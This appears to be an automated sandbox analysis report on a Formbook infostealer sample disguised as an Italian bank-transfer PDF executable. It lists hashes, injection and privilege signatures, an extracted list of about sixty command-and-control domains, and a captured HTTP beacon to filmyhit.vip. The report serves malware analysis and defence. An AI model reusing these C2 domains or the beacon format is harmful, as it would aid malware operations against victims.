Analysis
-
max time kernel
146s -
max time network
122s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
27-09-2024 00:07
Static task
static1
Behavioral task
behavioral1
Sample
Bonifico2692024pdf.exe
Resource
win7-20240704-en
General
-
Target
Bonifico2692024pdf.exe
-
Size
1.1MB
-
MD5
ab5a5fadd9a58b412281fa7c040c54ef
-
SHA1
d67c6a5fb65869cbb381c0a8276dea5e30ecfed1
-
SHA256
e4d1f88b5db146a70bce062886dd60b15d13bda9b325535ef4d3ffcb484981ec
-
SHA512
fd4144fccc27cab79fa9001e9847a65cc778f01c1d2311babc8982cd30c6ba4f2e85d8059f68b9111cfe103d29172dd40d4aadc6e29cb3db60a07e2af5d321f9
-
SSDEEP
24576:PAHnh+eWsN3skA4RV1Hom2KXMmHara7ystgXDMSJA1p5:yh+ZkldoPK8Yara7y4S5Wl
Malware Config
Extracted
formbook
4.1
e23y
stiloeconforto.shop
79nn470gl.autos
ffg.autos
elix-saaac.buzz
tlasbet88win.sbs
inoliga.app
777.fun
avada-ga-3.press
avandakitchen.online
61ep864tr.autos
igitalonlineseva.online
ar-deals-15908.bond
sqqpkv.pro
368i8rnoy.xyz
lxspinsenin.lol
9y204r7eo.sbs
toptalkingaboutit.net
eeplab.xyz
filmyhit.vip
athroom-remodeling-59089.bond
hwqcoiu.xyz
ome-care-76206.bond
tudioalberto.online
anfocusedviews.shop
ibrarygym.online
emosjumpers.net
mg-marketing.online
19bet.xyz
7556r.club
sed-cars-35796.bond
liveiraeletro.online
iangshen56.cloud
aeempreendora.online
bets.net
sychology-degree-69585.bond
est-arthritis-therapy-9711.buzz
zkirv.top
8015.xyz
uwueriudsjkdjnfjkdjnkxzk.vip
etausaha.online
crubber-brush-64789.bond
iversitiendaplus.shop
wrzlak.buzz
b-999.top
ower-bank-za-4886348.world
2361.asia
believehim.net
leeconcerned.info
oland-flight-deal.today
c-marketing.net
wgxb.top
pboardresult.net
nitednationsofindia.net
oupondhakel.shop
elationship-coach-72450.bond
ounjaronaturaloferta.online
wpgs2448.vip
8080734.xyz
mvqimnpwkxcixccaeafmibpiq.top
arpediemwireless.net
eth-paaad.buzz
renvillemarianne.net
tephsmith.info
opinformation.net
reakinggroundtherapy.pro
Signatures
-
Formbook payload 3 IoCs
resource yara_rule behavioral2/memory/1468-11-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral2/memory/1468-14-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral2/memory/3232-20-0x00000000004F0000-0x000000000051F000-memory.dmp formbook -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 5004 set thread context of 1468 5004 Bonifico2692024pdf.exe 82 PID 1468 set thread context of 3472 1468 svchost.exe 56 PID 3232 set thread context of 3472 3232 msdt.exe 56 -
Program crash 1 IoCs
pid pid_target Process procid_target 3180 5004 WerFault.exe 81 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bonifico2692024pdf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 60 IoCs
pid Process 1468 svchost.exe 1468 svchost.exe 1468 svchost.exe 1468 svchost.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe 3232 msdt.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 5004 Bonifico2692024pdf.exe 1468 svchost.exe 1468 svchost.exe 1468 svchost.exe 3232 msdt.exe 3232 msdt.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1468 svchost.exe Token: SeShutdownPrivilege 3472 Explorer.EXE Token: SeCreatePagefilePrivilege 3472 Explorer.EXE Token: SeShutdownPrivilege 3472 Explorer.EXE Token: SeCreatePagefilePrivilege 3472 Explorer.EXE Token: SeDebugPrivilege 3232 msdt.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 5004 Bonifico2692024pdf.exe 5004 Bonifico2692024pdf.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 5004 Bonifico2692024pdf.exe 5004 Bonifico2692024pdf.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 5004 wrote to memory of 1468 5004 Bonifico2692024pdf.exe 82 PID 5004 wrote to memory of 1468 5004 Bonifico2692024pdf.exe 82 PID 5004 wrote to memory of 1468 5004 Bonifico2692024pdf.exe 82 PID 5004 wrote to memory of 1468 5004 Bonifico2692024pdf.exe 82 PID 3472 wrote to memory of 3232 3472 Explorer.EXE 86 PID 3472 wrote to memory of 3232 3472 Explorer.EXE 86 PID 3472 wrote to memory of 3232 3472 Explorer.EXE 86 PID 3232 wrote to memory of 4788 3232 msdt.exe 87 PID 3232 wrote to memory of 4788 3232 msdt.exe 87 PID 3232 wrote to memory of 4788 3232 msdt.exe 87
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Users\Admin\AppData\Local\Temp\Bonifico2692024pdf.exe"C:\Users\Admin\AppData\Local\Temp\Bonifico2692024pdf.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\SysWOW64\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Bonifico2692024pdf.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 6843⤵
- Program crash
PID:3180
-
-
-
C:\Windows\SysWOW64\msdt.exe"C:\Windows\SysWOW64\msdt.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\SysWOW64\svchost.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4788
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5004 -ip 50041⤵PID:2172
Network
-
Remote address:8.8.8.8:53Request241.150.49.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request83.210.23.2.in-addr.arpaIN PTRResponse83.210.23.2.in-addr.arpaIN PTRa2-23-210-83deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request58.55.71.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request149.220.183.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request183.59.114.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.filmyhit.vipIN AResponsewww.filmyhit.vipIN A46.175.150.247
-
GEThttp://www.filmyhit.vip/e23y/?Ezrxu=9NElfXPu5ecZBRj7yXKDMGZSSmBmvFVpoUbMoZD6TZgeXSW70/jcbsqC9jyafvs+grBu&1bw=wHIhWlh8IzNXfpzPExplorer.EXERemote address:46.175.150.247:80RequestGET /e23y/?Ezrxu=9NElfXPu5ecZBRj7yXKDMGZSSmBmvFVpoUbMoZD6TZgeXSW70/jcbsqC9jyafvs+grBu&1bw=wHIhWlh8IzNXfpzP HTTP/1.1
Host: www.filmyhit.vip
Connection: close
ResponseHTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 00:08:28 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: http://filmyhit.vip/e23y/?Ezrxu=9NElfXPu5ecZBRj7yXKDMGZSSmBmvFVpoUbMoZD6TZgeXSW70/jcbsqC9jyafvs+grBu&1bw=wHIhWlh8IzNXfpzP
-
Remote address:8.8.8.8:53Request247.150.175.46.in-addr.arpaIN PTRResponse247.150.175.46.in-addr.arpaIN PTRcampers6ga
-
Remote address:8.8.8.8:53Requestwww.reakinggroundtherapy.proIN AResponse
-
Remote address:8.8.8.8:53Request88.210.23.2.in-addr.arpaIN PTRResponse88.210.23.2.in-addr.arpaIN PTRa2-23-210-88deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestwww.elationship-coach-72450.bondIN AResponse
-
Remote address:8.8.8.8:53Request43.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.8015.xyzIN AResponse
-
Remote address:8.8.8.8:53Requestwww.777.funIN AResponsewww.777.funIN CNAMEd2atqkubdsk7og.cloudfront.net
-
46.175.150.247:80http://www.filmyhit.vip/e23y/?Ezrxu=9NElfXPu5ecZBRj7yXKDMGZSSmBmvFVpoUbMoZD6TZgeXSW70/jcbsqC9jyafvs+grBu&1bw=wHIhWlh8IzNXfpzPhttpExplorer.EXE399 B 658 B 5 5
HTTP Request
GET http://www.filmyhit.vip/e23y/?Ezrxu=9NElfXPu5ecZBRj7yXKDMGZSSmBmvFVpoUbMoZD6TZgeXSW70/jcbsqC9jyafvs+grBu&1bw=wHIhWlh8IzNXfpzPHTTP Response
301
-
72 B 158 B 1 1
DNS Request
241.150.49.20.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
83.210.23.2.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
58.55.71.13.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
149.220.183.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
183.59.114.20.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
62 B 78 B 1 1
DNS Request
www.filmyhit.vip
DNS Response
46.175.150.247
-
73 B 98 B 1 1
DNS Request
247.150.175.46.in-addr.arpa
-
74 B 156 B 1 1
DNS Request
www.reakinggroundtherapy.pro
-
70 B 133 B 1 1
DNS Request
88.210.23.2.in-addr.arpa
-
78 B 143 B 1 1
DNS Request
www.elationship-coach-72450.bond
-
72 B 158 B 1 1
DNS Request
43.229.111.52.in-addr.arpa
-
58 B 123 B 1 1
DNS Request
www.8015.xyz
-
57 B 167 B 1 1
DNS Request
www.777.fun